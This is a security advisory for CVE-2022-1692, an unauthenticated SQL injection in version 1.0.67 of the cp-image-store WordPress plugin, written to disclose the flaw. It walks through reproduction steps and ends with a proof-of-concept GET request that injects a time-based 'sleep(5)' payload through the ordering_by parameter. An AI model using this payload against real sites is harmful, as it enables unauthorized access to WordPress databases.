cp-image-store 1.0.67 WordPress plugin SQL injection
|Date of Disclosure||May 09 2022|
|Affected Software Type||WordPress plugin|
|CVSS 3.x Base Score||9.8|
|CVSS 2.0 Base Score||7.5|
|Reporter||Daniel Krohmer, Shi Chen|
|Link to Affected Software||https://wordpress.org/plugins/cp-image-store|
|Link to Vulnerability DB||https://nvd.nist.gov/vuln/detail/CVE-2022-1692|
ordering_by query parameter in cp-image-store 1.0.67 is vulnerable to unauthenticated SQL injection. When the plugin is installed and a shortcode is placed on the blog, the respective page can be abused. An unauthenticated attacker may abuse an embedded
[codepeople-image-store] shortcode and trigger the vulnerability by simply calling the blog post page with an additional malformed
ordering_by query parameter.
admin user. Before we can launch the attack, we need to publish a post containing the affected shortcode.
Image Store and click on
Add New to create a new post.
Add the affected shortcode
[codepeople-image-store] and hit
Use the generated permalink to access the blog post containing the shortcode.
Visit the blog post page. No authentication is required while doing this.
Clicking the previous button triggers the vulnerable request. However, it needs to be slightly modified by adding
ordering_by, which is the vulnerable query parameter.
A POC may look like the following request:
Ensure that the assigned value of
ordering_by is a valid member of the
wp_posts table. Valid members are shown below:
In the code, the vulnerability is triggered by unsanitized user input of
ordering_by at line 2420 in
Finally, the database call ultimately leading to SQL injection can be found at line 2467 in
The SQL injection can be triggered by sending the request below.
GET /?cpis_image=379&ordering_by=post_author+and+sleep(5) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1